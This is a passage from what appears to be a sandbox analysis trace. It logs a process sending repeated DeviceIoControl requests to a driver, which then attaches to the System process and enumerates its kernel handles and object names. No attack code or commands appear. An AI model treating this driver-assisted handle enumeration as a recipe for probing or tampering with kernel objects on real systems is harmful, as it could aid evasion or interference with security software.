lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.663] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.663] PsAcquireProcessExitSynchronization () returned 0x0 [0199.663] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.663] ObReferenceObjectByHandle (in: Handle=0xffffffff80000524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a9d860, HandleInformation=0x0) returned 0x0 [0199.663] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.663] PsReleaseProcessExitSynchronization () returned 0x2 [0199.663] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.663] ObQueryNameString (in: Object=0xfffffa8003a9d860, ObjectNameInfo=0xfffffa8003153044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003153044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.663] ObfDereferenceObject (Object=0xfffffa8003a9d860) returned 0x2 [0199.663] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.664] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.664] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.664] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.664] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.664] PsAcquireProcessExitSynchronization () returned 0x0 [0199.664] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.664] ObReferenceObjectByHandle (in: Handle=0xffffffff80000528, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f7f2c0, HandleInformation=0x0) returned 0x0 [0199.664] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.664] PsReleaseProcessExitSynchronization () returned 0x2 [0199.664] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.664] ObQueryNameString (in: Object=0xfffffa8001f7f2c0, ObjectNameInfo=0xfffffa8003154044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003154044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.664] ObfDereferenceObject (Object=0xfffffa8001f7f2c0) returned 0x2 [0199.665] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.665] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.665] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.665] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.665] PsAcquireProcessExitSynchronization () returned 0x0 [0199.665] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.665] ObReferenceObjectByHandle (in: Handle=0xffffffff8000052c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80118c43b0, HandleInformation=0x0) returned 0x0 [0199.665] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.665] PsReleaseProcessExitSynchronization () returned 0x2 [0199.665] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.665] ObQueryNameString (in: Object=0xfffffa80118c43b0, ObjectNameInfo=0xfffffa8003155044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003155044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.666] ObfDereferenceObject (Object=0xfffffa80118c43b0) returned 0x2 [0199.666] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.666] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.666] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.666] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.666] PsAcquireProcessExitSynchronization () returned 0x0 [0199.666] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.666] ObReferenceObjectByHandle (in: Handle=0xffffffff80000530, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e8b8b0, HandleInformation=0x0) returned 0x0 [0199.666] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.666] PsReleaseProcessExitSynchronization () returned 0x2 [0199.667] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.667] ObQueryNameString (in: Object=0xfffffa8001e8b8b0, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.667] ObfDereferenceObject (Object=0xfffffa8001e8b8b0) returned 0x2 [0199.667] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.667] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.667] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.667] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.667] PsAcquireProcessExitSynchronization () returned 0x0 [0199.667] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.667] ObReferenceObjectByHandle (in: Handle=0xffffffff80000534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800d1d46f0, HandleInformation=0x0) returned 0x0 [0199.668] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.668] PsReleaseProcessExitSynchronization () returned 0x2 [0199.668] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.668] ObQueryNameString (in: Object=0xfffffa800d1d46f0, ObjectNameInfo=0xfffffa8003157044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003157044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.668] ObfDereferenceObject (Object=0xfffffa800d1d46f0) returned 0x2 [0199.668] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.668] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.668] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.668] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.668] PsAcquireProcessExitSynchronization () returned 0x0 [0199.669] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.669] ObReferenceObjectByHandle (in: Handle=0xffffffff80000538, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e8c050, HandleInformation=0x0) returned 0x0 [0199.669] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.669] PsReleaseProcessExitSynchronization () returned 0x2 [0199.669] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.669] ObQueryNameString (in: Object=0xfffffa8001e8c050, ObjectNameInfo=0xfffffa8003158044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003158044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.669] ObfDereferenceObject (Object=0xfffffa8001e8c050) returned 0x2 [0199.669] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.669] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.669] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.670] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.670] PsAcquireProcessExitSynchronization () returned 0x0 [0199.670] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.670] ObReferenceObjectByHandle (in: Handle=0xffffffff8000053c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034bd620, HandleInformation=0x0) returned 0x0 [0199.670] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.670] PsReleaseProcessExitSynchronization () returned 0x2 [0199.670] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.670] ObQueryNameString (in: Object=0xfffffa80034bd620, ObjectNameInfo=0xfffffa8003159044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003159044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.670] ObfDereferenceObject (Object=0xfffffa80034bd620) returned 0x2 [0199.670] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.671] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.671] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.671] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.671] PsAcquireProcessExitSynchronization () returned 0x0 [0199.671] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.671] ObReferenceObjectByHandle (in: Handle=0xffffffff80000540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e8c680, HandleInformation=0x0) returned 0x0 [0199.671] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.671] PsReleaseProcessExitSynchronization () returned 0x2 [0199.671] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.671] ObQueryNameString (in: Object=0xfffffa8001e8c680, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.671] ObfDereferenceObject (Object=0xfffffa8001e8c680) returned 0x2 [0199.671] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.672] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.672] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.672] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.672] PsAcquireProcessExitSynchronization () returned 0x0 [0199.672] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.672] ObReferenceObjectByHandle (in: Handle=0xffffffff80000544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003aa5d90, HandleInformation=0x0) returned 0x0 [0199.672] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.672] PsReleaseProcessExitSynchronization () returned 0x2 [0199.672] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.672] ObQueryNameString (in: Object=0xfffffa8003aa5d90, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.672] ObfDereferenceObject (Object=0xfffffa8003aa5d90) returned 0x2 [0199.672] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.672] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.673] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.673] PsAcquireProcessExitSynchronization () returned 0x0 [0199.673] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.673] ObReferenceObjectByHandle (in: Handle=0xffffffff80000548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800379ab60, HandleInformation=0x0) returned 0x0 [0199.673] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.673] PsReleaseProcessExitSynchronization () returned 0x2 [0199.673] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.673] ObQueryNameString (in: Object=0xfffffa800379ab60, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.673] ObfDereferenceObject (Object=0xfffffa800379ab60) returned 0x2 [0199.673] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.673] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.673] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.673] PsAcquireProcessExitSynchronization () returned 0x0 [0199.674] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.674] ObReferenceObjectByHandle (in: Handle=0xffffffff8000054c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003766050, HandleInformation=0x0) returned 0x0 [0199.674] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.674] PsReleaseProcessExitSynchronization () returned 0x2 [0199.674] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.674] ObQueryNameString (in: Object=0xfffffa8003766050, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.674] ObfDereferenceObject (Object=0xfffffa8003766050) returned 0x2 [0199.674] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.674] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.674] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.674] PsAcquireProcessExitSynchronization () returned 0x0 [0199.674] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.674] ObReferenceObjectByHandle (in: Handle=0xffffffff80000550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e125b0, HandleInformation=0x0) returned 0x0 [0199.675] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.675] PsReleaseProcessExitSynchronization () returned 0x2 [0199.675] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.675] ObQueryNameString (in: Object=0xfffffa8002e125b0, ObjectNameInfo=0xfffffa8003162044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003162044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.675] ObfDereferenceObject (Object=0xfffffa8002e125b0) returned 0x2 [0199.675] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.675] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.675] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.675] PsAcquireProcessExitSynchronization () returned 0x0 [0199.675] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.675] ObReferenceObjectByHandle (in: Handle=0xffffffff80000554, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a66220, HandleInformation=0x0) returned 0x0 [0199.675] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.676] PsReleaseProcessExitSynchronization () returned 0x2 [0199.676] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.676] ObQueryNameString (in: Object=0xfffffa8003a66220, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.676] ObfDereferenceObject (Object=0xfffffa8003a66220) returned 0x2 [0199.676] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.676] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.676] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.676] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.676] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.676] PsAcquireProcessExitSynchronization () returned 0x0 [0199.676] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.676] ObReferenceObjectByHandle (in: Handle=0xffffffff80000558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f74d00, HandleInformation=0x0) returned 0x0 [0199.677] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.677] PsReleaseProcessExitSynchronization () returned 0x2 [0199.677] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.677] ObQueryNameString (in: Object=0xfffffa8001f74d00, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.677] ObfDereferenceObject (Object=0xfffffa8001f74d00) returned 0x2 [0199.677] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.677] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.677] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.677] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.677] PsAcquireProcessExitSynchronization () returned 0x0 [0199.677] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.677] ObReferenceObjectByHandle (in: Handle=0xffffffff8000055c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034ec050, HandleInformation=0x0) returned 0x0 [0199.677] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.678] PsReleaseProcessExitSynchronization () returned 0x2 [0199.678] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.979] ObQueryNameString (in: Object=0xfffffa80034ec050, ObjectNameInfo=0xfffffa8003163044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003163044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.979] ObfDereferenceObject (Object=0xfffffa80034ec050) returned 0x2 [0199.979] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.979] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.979] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.979] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.979] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.979] PsAcquireProcessExitSynchronization () returned 0x0 [0199.979] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: 